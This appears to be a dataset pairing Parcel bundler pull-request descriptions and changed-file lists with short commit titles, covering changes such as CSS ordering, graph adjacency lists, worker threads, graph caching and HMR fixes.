This adds `eslint-plugin-monorepo` to our eslint config. It includes two rules:
* `monorepo/no-internal-import`, which prevents requiring deep into monorepo packages. This replaces our prior rule which used `no-restricted-imports` and `no-restricted-modules`, which was basically the same, except this has a clearer error message.
* `monorepo/no-relative-import`, which prevents requiring out of a package and into another using relative paths, i.e. `../../utils` rather than `@parcel/utils`.
Test Plan: Violate each rule in a file and verify `yarn lint` fails.
=> Prevent relative cross-package imports with eslint-plugin-monorepo

packages/configs/default/index.json
This restores *.webp to the raw transformer and packager globs. Looks like a bad merge left this out.
=> Restore webp to raw globs in default config

packages/core/integration-tests/test/css.js, packages/core/integration-tests/test/integration/css-order/a.css, packages/core/integration-tests/test/integration/css-order/b.css, packages/core/integration-tests/test/integration/css-order/c.css, packages/core/integration-tests/test/integration/css-order/d.css, packages/core/integration-tests/test/integration/css-order/e.css, packages/packagers/css/src/CSSPackager.js
Given the tree:
```
A
/   \
B     E
/ \
C   D
```
(A imports B (which imports C and D) and E)
... styles should be applied in the order C, D, B, E, A
Order is critical here since we're just concatenating styles, and CSS is sensitive to selector order.
This is possible now with the `exit` option added to traversals introduced in the scope hoisting PR
Test Plan: Integration test added. `yarn test`
=> CSSPackager: Apply CSS Styles in the correct order

packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/public/MainAssetGraph.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/missing-non-js/a.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/link.js
This was causing failures in the simple example.
Also pulls in the following change from #3037:
We now prune assets that don't match the bundle type when cloning the asset's subtree in the main asset graph. Prior to this change, it was possible for bundles to contain assets of different types in some circumstances.
Test Plan: Added an integration test. Run the simple example.
=> Prevent scope hosting from inserting requires for non-js assets

flow-libs/parcel-watcher.js.flow, packages/core/core/package.json, packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/Parcel.js, packages/core/integration-tests/test/server.js, packages/core/parcel/src/cli.js, packages/core/types/index.js, packages/reporters/dev-server/src/Server.js, packages/reporters/dev-server/src/ServerReporter.js
Rather than implement watch as an option to the `Parcel` constructor, allow for callers to subscribe to results from a `.watch()` function instead.
Here's the interface:
```
async watch(
cb?: (err: ?Error, buildEvent?: BuildEvent) => mixed
): Promise<AsyncSubscription>;
```
`watch` accepts a callback that receives either an error object or a `BuildEvent`. `BuildEvent` is either a success or failure event identical to what we give reporters. 
Setting up a watch subscription itself is an asynchronous process, so a promise to an `AsyncSubscription` is returned. An `AsyncSubscription` is an object with an asynchronous `unsubscribe` method.
`parcel.watch()` supports multiple subscribers by returning a subscription object that allows callers to unsubscribe when they are no longer interested in …
=> Implement explicit `watch` function and remove option

packages/core/core/src/BundlerRunner.js, packages/core/core/src/Graph.js, packages/core/core/src/public/BundleGraph.js, packages/core/core/src/public/MainAssetGraph.js, packages/core/core/test/AssetGraph.test.js, packages/core/core/test/Graph.test.js, packages/core/utils/src/DefaultMap.js, packages/core/utils/src/index.js, packages/core/utils/test/DefaultMap.test.js
* The existing edge list implementation of `Graph` very frequently iterates the entire list of edges in the graph to find outbound and inbound edges for specific uses.
* Instead, create two adjacency lists[0]: one for outbound edges from nodes and one for inbound edges. This means that getting a node's inbound or outbound edges no longer grows with the entire set of edges in the graph, and instead only grows with the node's own edges.
* `graph.hasEdge` and `graph.removeEdge` are now O(1) rather than O(E).
* `graph.getNodesConnectedTo` and `graph.getNodesConnectedFrom` are now bounded by the number of edges attached to the node rather than O(E).
* Retains an interfaces for retrieving all the edges in the graph. Like `graph.edges`, except it returns an array rather than a set (edge …
=> Implement Graph with adjacency lists rather than edge lists

packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/ResolverRunner.js, packages/core/core/src/TransformerRunner.js, packages/core/types/index.js, packages/namers/default/src/DefaultNamer.js, packages/packagers/css/src/CSSPackager.js, packages/packagers/html/src/HTMLPackager.js, packages/packagers/js/src/JSPackager.js, packages/packagers/raw/src/RawPackager.js, packages/resolvers/default/src/DefaultResolver.js, packages/runtimes/hmr/src/HMRRuntime.js, packages/runtimes/js/src/JSRuntime.js, packages/transformers/babel/src/BabelTransformer.js, packages/transformers/css/src/CSSTransformer.js, packages/transformers/html/src/HTMLTransformer.js, packages/transformers/js/src/JSTransformer.js, packages/transformers/raw/src/RawTransformer.js, packages/transformers/terser/src/TerserTransformer.js
This converts all the plugin apis to accept a single object with named keys. Some APIs are growing, and the number of parameters is getting awkward.
That said, we should continue to be conscious of the api we expose to plugins. Thanks @jamiebuilds for the suggestion 😃
Test Plan: flow, lint, test
=> Convert plugin parameters to param objects

packages/core/core/src/AssetGraph.js, packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/Graph.js, packages/core/core/src/OldAssetGraph.js, packages/core/core/src/dumpGraphToGraphViz.js, packages/core/core/src/types.js, packages/core/core/test/AssetGraph.test.js, packages/core/types/index.js
While working on adding config loading to the graph, which necessitated adding 4 more types to the graph, all of which no longer matter once we hit the bundling phase, I came up with the idea of building multiple graphs at the same time. One graph will still be called the `AssetGraph`, but it will only have nodes needed for Bundling onward (Assets and Dependencies). The other graph will be named the `RequestGraph` which keeps track of all of the requests that give us results that make up the `AssetGraph`. Eventually they will be built along side each other (in progress), but for now I am just converting the` OldAssetGraph` to the new `AssetGraph`, so that we can start working with the new `AssetGraph` as soon as possible, while I'm working on the multi graph approach.
`yarn test`/`yarn …
=> New AssetGraph

flow-libs/ink.js.flow, packages/reporters/cli/package.json, packages/reporters/cli/src/CLIReporter.js, packages/reporters/cli/src/Table.js, packages/reporters/cli/src/UI.js, packages/reporters/cli/src/index.js, packages/reporters/dev-server/src/Server.js, yarn.lock
This restores the rich ink-based CLI to parcel 2. It was disabled following issues with the devserver, but those don't seem to be present anymore.
There is one behavioral change: we now only print the bundle report in production mode.
Additionally, an unrelated error where the server would continue to serve 500 pages after build errors were resolved has been fixed.
Test Plan: 
* Run the kitchen sink, simple, and react-hmr examples and verify output and relevant exit code.
* Start the hmr server in the react-hmr example and introduce a syntax error. Verify that hmr reflects the error without reload. Verify reloading shows a 500 page. Fix the error and reload without a 500 page.
=> Restore rich CLI

packages/core/parcel-bundler/package.json, packages/core/parcel-bundler/src/cli.js
Added a new `info` command which prints out information about the local environment (proves to be useful while submitting bug reports).
`parcel info`
```bash 
Environment Info:
System:
OS: Linux 4.18 Ubuntu 18.10 (Cosmic Cuttlefish)
CPU: (4) x64 Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz
Binaries:
Node: 8.11.4 - /usr/bin/node
Yarn: 1.17.0-0 - /usr/local/bin/yarn
npm: 6.9.0 - /usr/local/bin/npm
Browsers:
Chrome: 74.0.3729.157
Firefox: 66.0.5
npmGlobalPackages:
parcel-bundler: 1.12.3
```
=> Added new info command 

packages/core/integration-tests/test/integration/scope-hoisting/es6/class-selfreference/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/class-selfreference/package.json, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/hoist.js
Another call to `traverse.cache.clearScope();` is needed to correctly rename references to classes in their own class body.
```js
class Bar {
constructor() {
this.foo = 'bar';
}
duplicate() {
return new Bar();
}
}
output = new Bar().duplicate();
```
would get hoisted into:
```js
class xyz {
constructor() {
this.foo = 'bar';
}
duplicate() {
return new Bar(); // <-----
}
}
output = new xyz().duplicate();
```
=> Add a missing clearScope to hoisting

packages/core/integration-tests/test/integration/scope-hoisting/commonjs/globals-polyfills/a.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/globals-polyfills/b.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/globals-polyfills/package.json, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/hoist.js
Globals (e.g. `var Buffer = require("buffer").Buffer;` inserted during hoisting need to be requeued to ensure traversal.
Test case is reduced from https://unpkg.com/sax@1.2.4/lib/sax.js
=> Requeue inserted globals when hoisting

packages/configs/default/index.json, packages/core/core/src/PackagerRunner.js, packages/core/integration-tests/test/css.js, packages/core/utils/src/index.js, packages/core/utils/src/urlRelative.js
This passes all but two css tests, one which requires a source map comment, and another which requires `@import` nesting.
For consistency with existing tests and Parcel 1, this also makes bundle url imports relative to the publicUrl rather than relative to the current bundle. While either is probably fine, and the former is arguably more portable independent of the publicUrl, I think the former is more common on the web and expected by developers.
As discussed in #3044, and to unblock some tests, this also changes raw assets to use a fallback `*` glob, rather than enumerating a bunch of common extensions.
Test Plan: yarn test
=> Pass more css integration tests

packages/core/core/src/PackagerRunner.js, packages/core/fs/src/index.js
Use https://nodejs.org/api/fs.html#fs_writestream_byteswritten instead of homebrew TapStream in `writeFileStream`
The equivalent part in TransfomerRunner can't be converted so easily:
https://github.com/parcel-bundler/parcel/blob/ef9b9772eea6504520ba8b3fbf3fbee1536c123d/packages/core/core/src/TransformerRunner.js#L341-L354
=> Use fsStream.bytesWritten

packages/utils/events/src/Disposable.js, packages/utils/events/src/index.js, packages/utils/events/test/Disposable.test.js
This adds `Disposable`, a class for wrapping other disposables or disposable-likes such as functions to dispose of resources.
This will allow us to add multiple disposables to the same object and manage the lifecycle of our own structures by disposing of a `Disposable` when our own structures are disposed.
Test Plan: Added unit tests.
=> Add Disposable

packages/utils/events/package.json, packages/utils/events/src/Disposable.js, packages/utils/events/test/Disposable.test.js
Some things missed in the initial PR:
* Frees the reference to the `Set` containing the inner disposables after the Disposable has been disposed.
* Allows for silent, no-op additional disposals
* Ensures that `.add()` cannot be called after the disposable has been disposed.
* Exposes a public property for checking the disposal state.
Test Plan: Unit tests
=> Disposable: Free disposables after disposal

packages/core/core/src/Parcel.js, packages/core/core/src/RequestGraph.js, packages/core/core/src/public/BundleGraph.js, packages/core/workers/src/Handle.js, packages/core/workers/src/WorkerFarm.js, packages/core/workers/src/child.js, packages/core/workers/src/types.js, packages/core/workers/test/integration/workerfarm/reverse-handle.js, packages/core/workers/test/workerfarm.js
Reverse handles are functions defined in the main process that can be called in worker processes. We will need this functionality for config requests because the main process will be in charge of loading configuration for plugins, so that the graph can be used to avoid rework.
`yarn test`/`yarn flow`/`yarn lint`
=> Add reverse handle functionality to WorkerFarm

packages/core/integration-tests/test/babel.js, packages/core/integration-tests/test/integration/babel-semver-engine/foo.js, packages/core/integration-tests/test/integration/babel-semver-engine/index.js, packages/core/integration-tests/test/integration/babel-semver-engine/package.json, packages/transformers/babel/src/env.js, packages/transformers/babel/src/getTargetEngines.js
Currently in v2, we pass semver ranges. `@babel/preset-env` expects browserslist-style minimum versions instead of semver ranges.
I discovered this when building Parcel 2 with Parcel 2.
Test Plan: Added an integration test
=> Pass minimum versions to @babel/preset-env

packages/configs/default/index.json, packages/configs/default/package.json, packages/core/integration-tests/test/javascript.js, packages/transformers/json/.babelrc, packages/transformers/json/package.json, packages/transformers/json/src/JSONTransformer.js
This implements a basic JSON transformer. It currently turns JSON the asset into a JavaScript one, which could become problematic should other assets need to import JSON. However, this is what Parcel 1 does, and it addresses our need to build Parcel 2 with Parcel 2.
Test Plan: Restored one integration test.
=> Implement basic json transformer

packages/core/core/src/Parcel.js, packages/core/core/src/TargetResolver.js, packages/core/core/src/resolveOptions.js, packages/core/integration-tests/test/server.js
This resolves all the file paths present in parcel options as absolute paths. Following `path.resolve(filePath)`, behavior, if a path is not absolute:
* Target `distDir`s resolved from package.json entries are resolved from the directory of the package.json file
* Currently (before and after this patch), if targets are specified in `package.json` and the default is used, its distDir is actually resolved from `cwd`, not from the package.json file. Should we change this to be resolved from the package.json's directory instead?
* Target `distDir`s passed in the programmatic api (`new Parcel({targets: [{...}, ...})`  are resolved from cwd.
* `cacheDir` is always resolved from cwd.
Test Plan:
* Add a log after options are resolved and run the simple example. Verify every path listed is …
=> Resolve option file paths as absolute

packages/core/integration-tests/test/babel.js
This fixes a failure introduced with #3047, which passed in its not-up-to-date state, but failed once integrated with v2.
=> Fix test from bad integration

packages/core/parcel-bundler/src/builtins/hmr-runtime.js
Fixes #3076 by using a web worker-safe alternative to `window.reload()`.
Fixes #2908
1. Clone [https://github.com/clintharris/parcel-hrm-bug-demo](https://github.com/clintharris/parcel-hrm-bug-demo)
1. `npm install && npm start`
1. Load http://localhost:1234, open browser JS console.
1. Edit `src/index.js` to trigger HMR `update`.
1. JS console error: `ReferenceError: window is not defined`
=> Fixes 3076: HMR update breaks in webworker

packages/core/core/src/Environment.js, packages/core/core/src/TargetResolver.js, packages/core/core/test/AssetGraph.test.js, packages/core/core/test/AssetGraphBuilder.test.js, packages/core/core/test/Environment.test.js, packages/core/core/test/TargetResolver.test.js, packages/core/core/test/fixtures/common-targets/package.json, packages/core/core/test/fixtures/custom-targets/package.json, packages/core/types/index.js
This:
* Allows `new Parcel` to accept an object mapping of targets to descriptors. Target descriptors have been formally separated from EnvironmentOpts, as they have always been a superset of them.
* The user now provides target descriptors either through `new Parcel` or through package.json, and we normalize everything and separate it into `Target` and `Environment`.
* Setting defaults for `Environment` has been moved to the `Environment` constructor
* Tests added for `Environment` and `TargetResolver`
Test Plan: Added new unit tests.
=> Accept an object of target descriptors in new Parcel

packages/core/utils/src/collection.js, packages/core/utils/src/md5.js, packages/core/utils/test/collection.test.js
This adds `objectSortedEntries` and `objectSortedEntriesDeep` which return a predictably sorted list of key/value tuples given an object.
We use objects frequently for deriving keys, often by stringifying and hashing them. Given differing key orders can represent the same object, and that JavaScript (by spec at least) doesn't guarantee stable key order, use this sorted list before stringifying.
Test Plan: Added unit tests.
=> Add objectSortedEntries for stringify stability

packages/core/core/src/public/MainAssetGraph.js
This removes an unnecessary traversal of the asset graph when creating a bundle. Looks like it was the result of a bad merge.
=> Remove duplicate graph traversal

packages/core/core/src/RequestGraph.js, packages/core/install-package/src/Yarn.js, packages/core/integration-tests/mochaSetup.js, packages/core/integration-tests/test/mocha.opts, packages/core/integration-tests/test/scope-hoisting.js, packages/core/integration-tests/test/sourcemaps.js
Cleaned up some small things for tests:
* Removed `.only` from source map tests. Not sure if it was intended to only not run the other tests in the same file, but the scope of `.only` is the entire test suite, so only 2 integration tests were running recently. Found and fixed a small bug that popped in that time. Also added an eslint plugin to prevent this in the future.
* Unhandled promise rejections  were going unnoticed in tests. Removed the `--exit` option from mocha in integration tests as it is no longer needed anymore and it ensures we will catch the unhandled promise rejection before mocha exits. Fixed an unhandled rejection bug.
=> Test cleanup

.flowconfig, package.json, packages/configs/default/test/config.test.js, packages/core/core/src/Graph.js, yarn.lock
Updates to the latest flow version. Also updates two cases where our code was not flow-safe:
* Makes the config test refine objects using `typeof` and a null check
* Makes `Graph`'s checking of visitors first check that the visitor is a function before using `visitor.enter` (or exit), since it's possible there could be a mixed `enter` property on a function.
Test Plan: `yarn flow`, `yarn test`
=> Update flow to v0.101

packages/core/core/package.json, packages/core/core/src/Asset.js, packages/core/integration-tests/test/sourcemaps.js, packages/core/utils/src/index.js, packages/core/utils/src/relativeUrl.js, packages/transformers/babel/src/BabelTransformer.js, packages/transformers/js/src/JSTransformer.js
This fixes an issue where source maps were not properly persisted nor restored during the commit phase and constructor in Asset.
Test Plan: 
* yarn test for sourcemap integration tests
* run the kitchen sink example before, verify empty sourcemaps. Run it after, and verify source maps have content.
=> Persist and restore sourcemaps in Asset

packages/core/core/src/TargetResolver.js
HMR options can't have a `publicUrl`, and it's possible we might support hmr independent of serve mode. If there aren't serve options, we're not serving.
=> Don't use hmr options to determine serve mode

packages/core/core/src/AssetGraph.js, packages/core/core/src/ResolverRunner.js
Currently, multitarget builds after the first begin to fail, as ResolverRunner resolutions are reused, keyed by source path and module specifier.
They also would need to be keyed by environment. However, since this cache logic is being moved into the request graph (the resolver runner would be avoided entirely), simply remove it from the resolver runner.
Test Plan: Enable async imports in the kitchen sink example. Build with visualization and verify that dependencies for different environments do not resolve to the same asset group.
=> Fix failing multitarget builds

packages/core/core/src/Transformation.js, packages/core/integration-tests/test/html.js
This fixes a small bug in the transformation pipeline when run in workers where the pipeline ids (which are arrays) do not have equal object identity. This is due to the reverse handle being used to get the Parcel config, which means the config is copied across IPC each time and therefore has different object identity. This is fixed by joining the pipeline into a string and using that as an id instead.
A future optimization could be to not go across IPC every time we switch pipelines at all. We only need to re-resolve the parcel config if the directory changes, which will never happen for an asset. So we really only need to resolve the config once at the start of a transformation rather than for each individual pipeline.
Left a few other comments inline for some other things I noticed:
* …
=> Fix pipeline id identity in workers

packages/core/core/src/PackagerRunner.js, packages/core/fs/src/index.js, packages/core/integration-tests/test/integration/node_hashbang/local.js, packages/core/integration-tests/test/integration/node_hashbang/main.js, packages/core/integration-tests/test/integration/node_hashbang/package.json, packages/core/integration-tests/test/javascript.js, packages/packagers/js/src/JSPackager.js, packages/shared/scope-hoisting/src/generate.js, packages/transformers/js/src/JSTransformer.js
This is necessary for Parcel 2 to build node cli executables like Parcel's own cli.
For hashbangs in JavaScript, we extract the `interpreter` value from the Babel AST, and store it in `asset.meta.interpreter`. We then read from this during packaging and, if present, prepend it to the bundle output. We do the same in scope hoisting.
For file modes (unix-style numeric permission values), a `fileMode` property is attached to each asset. After packaging and optimizing, before the file is written, we use the `fileMode` associated with the entry asset as the file mode for the file written to disk.
Test Plan: Added integration tests for hashbangs, hashbangs in scope hoisting, and preserving file modes.
=> Preserve hashbangs and file modes from entry assets to bundles

packages/core/core/src/AssetGraph.js, packages/core/core/src/public/Bundle.js, packages/core/core/src/public/MainAssetGraph.js, packages/core/types/index.js, packages/packagers/css/src/CSSPackager.js, packages/shared/scope-hoisting/src/concat.js
The `traverseAncestors` method of `Bundle` objects was problematic because it leaked internal details of the asset graph, and also for performance reasons. There were only two uses of it, and this PR replaces them both:
* The CSS packager's use was to determine if any incoming dependencies had a media attached to them. This has been replaced by exposing the `getIncomingDependencies` method on the bundle instead (previously called `getAncestorDependencies` which was incorrect since it only retrieves a single level up).
* The scope hoisting packager used it to determine if any ancestor dependencies were marked as needing to be wrapped in a function (e.g. require in an if statement). This is replaced by marking the assets are part of an initial traversal downward rather than traversing back …
=> Remove usage of Bundle#traverseAncestors

.flowconfig, azure-pipelines-template.yml, flow-libs/worker_threads.js.flow, packages/core/core/src/Transformation.js, packages/core/integration-tests/test/html.js, packages/core/workers/package.json, packages/core/workers/src/Handle.js, packages/core/workers/src/Worker.js, packages/core/workers/src/WorkerFarm.js, packages/core/workers/src/backend.js, packages/core/workers/src/bus.js, packages/core/workers/src/child.js, packages/core/workers/src/childState.js, packages/core/workers/src/index.js, packages/core/workers/src/process/ProcessChild.js, packages/core/workers/src/process/ProcessWorker.js, packages/core/workers/src/threads/ThreadsChild.js, packages/core/workers/src/threads/ThreadsWorker.js, packages/core/workers/src/types.js, packages/core/workers/test/workerfarm.js
This builds on #3228 and implements a worker farm backend based on the node 10 [worker_threads](https://nodejs.org/api/worker_threads.html) module. It will still continue to fall back to child processes on older versions of node.
Most of the implementation is the same, it just abstracts away the details into backends that each implement the same interface. The worker threads implementation should be faster in theory (I haven't fully tested yet) since it is much faster to spin up threads than processes, and the memory space is shared which means that messages are not copied between threads as they are with processes. Instead, [transferrable objects](https://developer.mozilla.org/en-US/docs/Web/API/Transferable) are used to implement zero-copy array buffer sharing.
Some additional testing …
=> Implement node worker_threads backend

packages/core/core/src/Graph.js, packages/core/core/src/types.js, packages/core/core/test/AssetGraph.test.js, packages/core/core/test/Graph.test.js
This implements basic support for edge types in the graph. This allows for multiple edges between nodes, along differing edge types.
This also implements a basic filter for traversal, which allows traversal to only traverse along a path of a given edge type. In the future we may expand this to considering multiple types, only edge types between certain types of nodes, etc.
This is implemented by expanding `AdjacencyList` to be a `Map<FromId, Map<EdgeType, Set<ToId>>>`, which slightly complicates the internal structure.
This is fully backwards compatible, as it only adds a single optional parameter to most existing interfaces. If the `type` parameter is not provided, internally it falls back to `null` which is an acceptable edge type indicating nothing was provided.
Alternate designs:
* …
=> Implement edge types in Graph

yarn.lock
Rename 'opn' in yarn.lock to 'open' as package.json
In PR #3161, it seems yarn.lock wasn't updated as  `package.json`. This PR fix this mismatch between `package.json` and `yarn.lock`.
=> v2 update yarn.lock (opn -> open)

packages/core/cache/src/Cache.js, packages/core/core/src/Asset.js, packages/core/core/src/AssetGraph.js, packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/Graph.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/Parcel.js, packages/core/core/src/ParcelConfig.js, packages/core/core/src/RequestGraph.js, packages/core/core/src/public/Bundle.js, packages/core/core/src/public/MainAssetGraph.js, packages/core/core/src/registerCoreWithSerializer.js, packages/core/core/test/AssetGraphBuilder.test.js, packages/core/fs/src/NodeFS.js, packages/core/source-map/src/SourceMap.js, packages/core/types/index.js, packages/core/utils/src/stream.js, packages/namers/default/src/DefaultNamer.js
Currently, the Parcel cache only stores individual assets, but there are now a few other things that can be cached. This PR adds caching for the asset graph as a whole, the bundle graph, and the results of packaging and optimizing individual bundles.
When Parcel exits, it now writes the full asset graph and request graph into the cache. When it starts up again, it can simply load them from disk rather than rebuild them from scratch. Even with individual asset transformations cached, it was still slow to build the entire graph for large applications due to resolving and checking the cache individually for each asset.
To make this work, we also use the new watcher to store a snapshot of the current filesystem into the cache along side the graphs. When Parcel starts up, it loads the graphs, …
=> Cache asset graph, bundle graph, and packager/optimizer results

packages/core/workers/src/process/ProcessWorker.js, packages/core/workers/src/threads/ThreadsWorker.js
The deleted code was originally added for @parcel/register so processes would not hang, but it also caused a weird issue where Parcel could potentially exit early with a clean exit code. It is also not even beneficial for @parcel/register to use Workers because it is hooking into require which is synchronous and cannot be parallelized.
=> No longer use unref in Workers

packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/BundleGraph.js, packages/core/core/src/public/BundleGraph.js, packages/core/core/src/public/BundlerBundleGraph.js, packages/core/integration-tests/test/integration/shared-bundlegroup/a.js, packages/core/integration-tests/test/integration/shared-bundlegroup/b.js, packages/core/integration-tests/test/integration/shared-bundlegroup/c.js, packages/core/integration-tests/test/integration/shared-bundlegroup/index.js, packages/core/integration-tests/test/javascript.js, packages/core/types/index.js, packages/runtimes/js/src/JSRuntime.js
This corrects a bug when multiple bundles attempted to async import a module, only one would receive the necessary runtime code to load it.
As a concrete example:
`index.js`:
```js
import('./a');
import('./b');
```
`a.js`:
```js
import('./c');
```
`b.js`:
```js
import('./c');
```
(And some `c.js`, but contents don't matter)
Fails to run, as one of `a` or `b` does not get the necessary runtime code.
Both bundles would have dependencies pointing to the bundle group containing the bundled async module, but because bundle groups had only one reference to an inbound dependency, only the dependency referenced there would have runtime code inserted.
This is fixed by using the relationship between dependencies and bundle groups encoded in the bundlegraph, rather than using a property on bundle …
=> Support loading runtimes from multiple inbound dependencies

packages/core/core/src/resolveOptions.js
This makes `rootDir` always an absolute path by:
* Resolving it relative to cwd if specified by programmatic api
* Resolving all entries (which should also be absolute paths anyway), so that `getRootDir` also returns an absolute path
Test Plan: 
* Use the programmatic api and pass relative entries, and verify that the resulting `rootDir` is absolute. Note that bundle names are correct since they relied on finding a the path between `rootDir` and the entry asset path.
* Use the programmatic api and pass a relative `rootDir`. Verify it is resolved to an absolute path.
=> Config: resolve all entries and rootDir to absolute paths

gulpfile.js
These are static resources that need to by copied as-is during build. We should probably reconfigure the build to exclude things rather than require everything to be specified.
Test Plan: `yarn build` and `ls packages/reporters/dev-server/lib/templates`
=> Copy devserver templates during build

packages/bundlers/default/src/DefaultBundler.js, packages/core/integration-tests/test/integration/no-shared-bundles-from-entries/a.js, packages/core/integration-tests/test/integration/no-shared-bundles-from-entries/b.js, packages/core/integration-tests/test/integration/no-shared-bundles-from-entries/package.json, packages/core/integration-tests/test/javascript.js
Resolves #3303
This makes sure that we don't create shared bundles from entry bundles, since they would also need to be entries, and are conditionally created based on bundler options and bundler input, making them unpredictable and difficult to reference.
Test Plan: Added integration test
=> Don't create shared bundles from entry bundles

packages/bundlers/default/src/DefaultBundler.js, packages/core/integration-tests/test/integration/worker-no-deduplicate/index.js, packages/core/integration-tests/test/integration/worker-no-deduplicate/worker-a.js, packages/core/integration-tests/test/integration/worker-no-deduplicate/worker-b.js, packages/core/integration-tests/test/javascript.js, packages/core/test-utils/src/utils.js
Resolves #3327
This opts bundles with isolated environments out of optimizations in the bundler, as they are unable to access assets in parent bundles or load shared bundles.
Test Plan: Added integration test
=> Don't deduplicate or share bundles in isolated environments

packages/core/integration-tests/test/html.js, packages/packagers/html/package.json, packages/packagers/html/src/HTMLPackager.js, packages/transformers/html/src/HTMLTransformer.js
This ports the logic to insert sibling bundles into HTML in the packager from Parcel 1, and re-enables the tests. For example, a <script> tag in the original HTML may import CSS files. This will result in a sibling bundle in the same bundle group as the JS, which will be inserted as a <link> element into the HTML by the packager.
This also disables inline assets in HTML for now, as they were resulting in separate bundles being generated. Will be re-enabled once the work on #3301 is done.
=> Insert sibling bundle references into HTML

packages/core/logger/src/Logger.js, packages/core/parcel/package.json, packages/core/parcel/src/cli.js, packages/core/workers/src/WorkerFarm.js, packages/core/workers/src/child.js, packages/reporters/cli/package.json, packages/reporters/cli/src/CLIReporter.js, packages/reporters/cli/src/UI.js
This refactors the CLI reporter slightly to fix a few issues.
1. The console is now patched in the main process again, but only when using the Parcel CLI. The code moved into the logger package with an exported function to enable it.
2. The reducer is moved back into the React component for the CLI reporter.
3. `warmWorkers` is turned off to avoid duplicate and out of order reporter events being sent. This actually increased perf of the react-hmr example under worker threads, so maybe we don't need it anymore.
=> Refactor CLI reporter

flow-libs/ink.js.flow, packages/core/parcel/src/cli.js, packages/reporters/cli/src/Log.js, packages/reporters/cli/src/UI.js, packages/reporters/dev-server/src/Server.js
The log in the server reporter to display what url the server is running on didn't work because the logs were reset on the `buildStart` event and that log happened before. Also, we want that line to be persistent and not reset on every build. There is also special formatting for the url, so we now do this in the CLI reporter directly instead of going through the logger at all.
Additionally, if the requested port cannot be used, we fall back to a different port automatically in the CLI and display a warning.
=> Display server URL in CLI reporter

packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/RequestGraph.js, packages/core/utils/src/PromiseQueue.js, packages/packagers/css/package.json, packages/packagers/css/src/CSSPackager.js, packages/packagers/js/src/JSPackager.js, packages/shared/scope-hoisting/package.json, packages/shared/scope-hoisting/src/concat.js
Currently, when packaging assets in the JS and CSS packagers, we use `Promise.all` to read all of the assets in parallel with unbounded concurrency. For large apps, this results in `EMFILE` errors due to too many open file descriptors.
This PR limits concurrency in the packagers by using a `PromiseQueue` instead of `Promise.all`. This required a few changes to `PromiseQueue` to make it behave like `Promise.all` and return an array of results.
=> Limit concurrency when reading assets in packagers

packages/core/core/src/BundlerRunner.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/public/Bundle.js, packages/core/core/src/public/BundlerBundleGraph.js, packages/core/core/src/types.js, packages/core/integration-tests/test/scope-hoisting.js, packages/core/test-utils/src/utils.js, packages/core/types/index.js, packages/namers/default/src/DefaultNamer.js, packages/packagers/js/src/JSPackager.js, packages/runtimes/hmr/src/HMRRuntime.js, packages/runtimes/js/src/JSRuntime.js, packages/shared/scope-hoisting/src/concat.js, packages/shared/scope-hoisting/src/generate.js
HMR was broken due to the change to support only one entry asset per bundle. For the runtime to work, it needs to run before the main entry to override some things in the module runtime.
This PR changes `bundle.entryAssetId` to be `bundle.entryAssetIds` instead, and adds an `isEntry` option to the return value of Runtime plugins. When set, the resulting asset will be added as an entry to the bundle, before the real entry.
A new `getMainEntry` method is also added to `Bundle` objects to retrieve the last entry in the list, which is typically what you want. `getEntryAssets` is retained to get the full list.
=> Ensure that HMR runtime is added as an entry to the bundle

packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/ConfigLoader.js, packages/core/core/src/InternalConfig.js, packages/core/core/src/Parcel.js, packages/core/core/src/RequestGraph.js, packages/core/core/src/Transformation.js, packages/core/core/src/Validation.js, packages/core/core/src/public/Config.js, packages/core/core/src/types.js, packages/core/parcel/src/cli.js
This implements asset/request graph caching in watch and serve mode. Previously it only worked in build mode. When the user exits Parcel in watch mode, it now gracefully shuts down and writes the graphs to disk.
It also fixes serializing the graph when in an invalid state, so you can e.g. make a syntax error, restart Parcel, and it will restore back into that state. This is accomplished by keeping the `invalidNodeIds` in the request graph up to date and serializing them along with the graph.
Additional fixes:
* Config -> plain objects cherry picked from #3261.
* If a watch event happened while the request graph is already in an invalid state, it would always trigger a build even if no actual known files in the graph changed. It now only triggers if a node is invalidated based on the …
=> Cache graph in watch mode

flow-libs/chrome-trace-event.js.flow, flow-libs/inspector.js.flow, packages/core/core/src/Parcel.js, packages/core/core/src/resolveOptions.js, packages/core/core/src/types.js, packages/core/core/test/utils.js, packages/core/parcel/src/cli.js, packages/core/types/index.js, packages/core/workers/package.json, packages/core/workers/src/Profiler.js, packages/core/workers/src/Trace.js, packages/core/workers/src/WorkerFarm.js, packages/core/workers/src/child.js, yarn.lock
This adds support for multi threaded/multi process profiling of Parcel. You just add the `--profile` flag to the CLI or the `profile` option to the Parcel API, and it will begin outputting trace files in the CWD as builds are performed. These trace files can be loaded in the Performance tab of the chrome dev tools to view the profiles. You can expand the timelines for each process to view a detailed flame chart.
The profiles are done using the builtin [inspector](https://nodejs.org/api/inspector.html) module of Node, and combined together with the [chrome-trace-event](https://github.com/samccone/chrome-trace-event) library. The WorkerFarm adds two methods to start and stop a profile, and broadcasts this to all workers.
=> Add --profile option for multi threaded profiling

packages/core/core/src/resolveOptions.js
`killWorkers` had been defaulting to `false`, preventing the workerfarm from ending in situations like `parcel build`.
Test Plan: 
* Verify that `parcel build` in the hmr example exits the process with a `0` exit code. 
* Verify that `parcel build` in the hmr example exits the process with a `1` when a syntax error is introduced
* Verify that `parcel`, which defaults to `parcel serve`, does not exit the process after its first build
=> Default to ending WorkerFarm

packages/core/parcel/src/cli.js
